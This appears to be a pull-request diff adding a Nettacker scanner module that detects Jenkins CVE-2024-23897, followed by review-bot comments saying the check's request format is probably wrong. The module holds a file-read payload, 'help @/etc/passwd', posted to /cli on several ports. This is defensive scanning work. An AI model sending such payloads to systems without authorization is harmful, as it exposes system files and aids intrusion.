56 changes: 56 additions & 0 deletions nettacker/modules/vuln/jenkins_cve_2024_23897.yaml
@@ -0,0 +1,56 @@
info:
name: jenkins_cve_2024_23897_vuln
author: Prajwal G N (@Prajwal5755)
severity: 7.5
description: Detects Jenkins CVE-2024-23897 arbitrary file read via CLI argument parsing using @file syntax.
reference:
- https://www.jenkins.io/security/advisory/2024-01-24/
profiles:
- vuln
- jenkins
- cve

payloads:
- library: http
steps:

- method: post
timeout: 3
headers:
User-Agent: "{user_agent}"
Content-Type: "text/plain"
ssl: false

Comment on lines +17 to +23
Contributor

⚠️ Potential issue | 🟠 Major

Add explicit ssl on the HTTP step.

Lines 17–22 define the HTTP step without an explicit ssl field. Please set it explicitly to avoid ambiguous transport behavior across targets.

Suggested patch
       - method: post
         timeout: 3
+        ssl: false
         headers:
           User-Agent: "{user_agent}"
           Content-Type: "text/plain"

Based on learnings: “Every HTTP step must include headers.User-Agent: "{user_agent}", ssl:, and the info block must include reference:.”

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@nettacker/modules/vuln/jenkins_cve_2024_23897.yaml` around lines 17 - 22, The
HTTP step that currently shows method: post with headers.User-Agent and
Content-Type needs an explicit ssl field to avoid ambiguous transport—add ssl:
true (or ssl: false if this target is known plaintext) directly under the step
alongside timeout, and ensure the rule's info block includes a reference: entry
(e.g., info.reference: "CVE-2024-23897" or a vendor advisory) so the file
jenkins_cve_2024_23897.yaml contains headers.User-Agent: "{user_agent}", an
explicit ssl setting, and an info.reference value.

url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}{{path}}"
prefix: ""
interceptors: []
suffix: ""
data:
schema:
- "http"
- "https"
path:
- '/cli'
ports:
- 80
- 443
- 8080
- 8443


data: |
help @/etc/passwd

response:
log: "Confirmed CVE-2024-23897 vulnerability detected"
condition_type: and
conditions:
status_code:
regex: "200"
reverse: false
content:
regex: "(root:x:0|daemon:x:1)"
reverse: false
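Review bot: The step is a single plaintext POST to `/cli` with the body `help @/etc/passwd`, which is not how the Jenkins CLI HTTP transport receives arguments: the CLI pairs a download request and an upload request that share a `Session` header and are told apart by a `Side` header, and the upload body carries the command and its arguments as protocol-encoded frames rather than raw text. A bare `help @/etc/passwd` body is therefore unlikely to reach the args4j parser whose `@file` expansion this CVE abuses, so the content condition `(root:x:0|daemon:x:1)` would never match and the module would report vulnerable instances as clean. Please model the check on the CLI protocol (two steps sharing a generated session id, one with `Side: download` and one with `Side: upload`, the upload body encoded accordingly) or, if Nettacker's http library cannot express that, state the limitation in `description`. Two smaller points: `ssl: false` at the step level is combined with a `schema` list that contains `https`, so please confirm which of the two Nettacker honors; and the fuzzer cross-product of `schema` {http, https} with `ports` {80, 443, 8080, 8443} also sends http to 443 and https to 80, doubling the request count without adding coverage. Finally, verify that `severity: 7.5` matches the score published for this CVE in the linked advisory before merging.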